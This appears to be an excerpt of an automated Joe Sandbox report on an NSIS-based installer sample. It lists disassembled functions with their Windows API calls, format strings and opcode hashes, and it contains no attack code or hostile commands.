                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                        • API String ID: 2014279497-3433828417
                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                        • GetMessagePos.USER32 ref: 0040489D
                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                        • MulDiv.KERNEL32(00018200,00000064,0010FB6C), ref: 00403295
                                        • wsprintfW.USER32 ref: 004032A5
                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                        Strings
                                        • verifying installer: %d%%, xrefs: 0040329F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GlobalFree.KERNEL32(00000000), ref: 00402387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FreeGloballstrcpyn
                                        • String ID: 176$Exch: stack < %d elements$Pop: stack empty
                                        • API String ID: 1459762280-95732424
                                        • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                        • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • GlobalFree.KERNEL32(00000000), ref: 00402387
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 3376005127-0
                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                        • String ID:
                                        • API String ID: 2568930968-0
                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 004020A3
                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                        Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                        • wsprintfW.USER32 ref: 00404483
                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                        • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                        • API String ID: 1697273262-1764544995
                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                        • lstrlenW.KERNEL32 ref: 004026B4
                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                        • String ID: CopyFiles "%s"->"%s"
                                        • API String ID: 2577523808-3778932970
                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
